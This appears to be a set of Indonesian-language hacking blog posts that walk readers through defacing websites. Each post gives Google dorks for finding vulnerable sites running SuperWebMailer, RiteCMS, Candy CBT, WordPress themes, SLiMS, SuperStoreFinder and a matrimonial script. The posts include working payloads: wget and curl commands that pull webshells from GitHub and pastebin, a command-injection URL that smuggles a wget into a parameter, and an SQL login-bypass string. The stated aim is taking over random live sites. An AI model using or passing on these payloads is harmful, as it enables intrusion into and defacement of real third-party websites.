Unauthentication RCE SuperWebMailer

Unauthentication RCE SuperWebMailer

Dork :
inurl:/swm/defaultnewsletter.php

Tools :
https://github.com/Aryaalfahrezi010/RCE_SuperWebMailer

Shell:
https://raw.githubusercontent.com/linuxsec/indoxploit-shell/master/shell-v3.php Pass IndoXploit


Oke pertama kita dorking dulu seperti biasa

Pilih web yg lo mau terserah
Nah Habis Itu lu hapus bagian defaultnewsletter.php

jadi (https://sitelu.com/swm)

habis itu lu install tools nya gblk

pakek python3 ya itu jangan lupa

python3 exploit.py -u https://sitelu/swm/
Nanti kalo vuln ada tulisannya kyak dibwh ini

Habis itu command rce nya

wget https://raw.githubusercontent.com/linuxsec/indoxploit-shell/master/shell-v3.php

Btw itu gua pakek mini shell karna shell tdi ga supp ama web w

Tinggal Akses dah

https://sitelo.com/swm/shell-v3.php

Contact : ncdream72@gmail.com

RiteCMS 2.2.1 - Authenticated Remote Code Execution

RiteCMS 2.2.1 - Authenticated Remote Code Execution

Vendor Homepage: http://ritecms.com/

Version: 2.2.1

Dork:

intext:"Powered By RiteCMS"

1- Go to following url. >> http://(HOST)/cms/

2- Default username and password is admin:admin. We must know login credentials.

3- Go "Filemanager" and press "Upload file" button.

4- Choose your php webshell script and upload it.

shell access?http://target.com/media/yourshell.php

Ref? Rite Cms

Contact : ncdream72@gmail.com

Deface PoC Computer Based Test RCE

 

Deface Poc Computer Based Test RCE

Dork:
"Support By Candy CBT"
"Support By Candy CBT"+"Login"
"Candy CBT"+"Login"
(Kembangin lagi gann...)

# Exploit #
-admin/ifm.php

jika saat di masukan Exploit nya malah redirect ke halaman admin/login.php

Maka itu tandanya vuln.

# Kode Rce #
curl http://targetkalian.com/admin/ifm.php -d 'api=remoteUpload&dir=&filename=D.php&method=curl&url=https://pastebin.com/raw/Vsaj9aS3'

Nama shell nya D.php bsa lu ganti sesuka hati lo

Akses Shell?
http://linktarget.com/files/namashell.php

contact : ncdream72@gmail.com

Deface WordPress Orange Themes

 

Deface WordPress Orange Themes

Dork : 

- inurl:/wp-content/themes/kernel-theme

- inurl:/wp-content/themes/bordeaux-theme

- inurl:/wp-content/themes/bulteno-theme

- inurl:/wp-content/themes/rayoflight-theme

Exploit :

/functions/upload-handler.php

Crsf Online :

https://blogpongo.com/csrf.php

Kalian Dorking Dulu di google

Pilih Salah Satu Web/Target Tambahin Exploitnya

Vuln?= Ada bacaan Error

Lalu Kalian Bukan Csrfnya

Masukkan Url

Contoh :

https://sitetarget.com/wp-content/themes/kernel-theme/functions/upload-handler.php

Post File : orange_themes

Kemudian Klik Submit Nah Terus Upload Shell/Sc Lu Kalo Sukses Nanti Keluar Nama File Kalian

Location File?:/wp-content/uploads/[tahun]/[bulan]/file lu

contoh :

https://sitetarget.com/wp-content/uploads/2020/02/sht.html

contact : ncdream72@gmail.com

Slims command injection Upload Shell

Slims command injection Upload Shell

Google Dorks :

- inurl:/index.php?p=show_detail&id= 

- "Detail Cantuman" site:ac.id 

- "Powered By Slims7" site:ac.id

Payload:

/lib/watermark/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%2075%20-interlaceline%20file.jpg%20jpeg:file.jpg%20;wget%20https://raw.githubusercontent.com/backdoorhub/shell-backdoor-list/master/shell/php/mini.php;%20&phpThumbDebug=9

taruh payload dimana om?

terget.com/payload

target.com/path/payload

Akses Shell:

https/target.com/lib/watermark/mini.php

contact me :ncdream72@gmail.com

sumber:

https://exploit.zone-dark.com/multiple-web-vulnerablities-pada-slims7-rce-xss-csrf/

https://www.bandung6etar.my.id/2020/09/deface-cms-slims-command-injection.html

SuperStoreFinder Wordpress Plugins Arbitrary File Upload

 

SuperStoreFinder Wordpress Plugins Arbitrary File Upload

Dork:

- SuperStoreFinder

- Inurl:superstorefinder-wp

- Inurl:superlogoshowcase-wp

SuperStoreFinder Exploit Upload Shell

https://pastebin.com/raw/pMuFWLLm

Usage:python filename.py http://google.com

Ref:

https://packetstormsecurity.com/files/159627/

Kocak Rdnm

still don't get it?

https://youtu.be/sPEJz6KvDbs

Contact : ncdream72@gmail.com

Matrimonial Auth Bypass Admin Vulnerability

Matrimonial Auth Bypass Admin Vulnerability 

{+}Dork : inurl:"printprofile.php?id="
{+}U/p : '=''or'

• Dorking dulu webnya di google atau search engine lain
• Lalu kasi /admin/ contoh www.site.com/admin/

Tinggal Login dengan u/p diatas

Stelah login kalian klick web setting

Maka akan muncul tampilan seperti dibawah ini

Tinggal Lu edit2 kalo ga di jso aja.

Nyari tempat buat upshell? Cari sendiri jangan manja.